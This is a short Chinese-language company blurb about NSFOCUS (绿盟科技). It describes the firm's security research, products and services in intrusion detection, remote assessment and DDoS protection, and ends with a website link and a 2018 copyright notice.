绿盟科技(NSFOCUS Co., Ltd.)是中国网络安全领域的领导企业,致力于网络和系统安全问题的研究、高端网络安全产品的研发、销售与网络安全服务,在入侵检测/保护、远程评估、 DDoS攻击防护等方面提供具有国际竞争能力的先进产品,是国内最具安全服务经验的专业公司。有关绿盟科技的详情请参见: http://www.nsfocus.com

© 2018 绿盟科技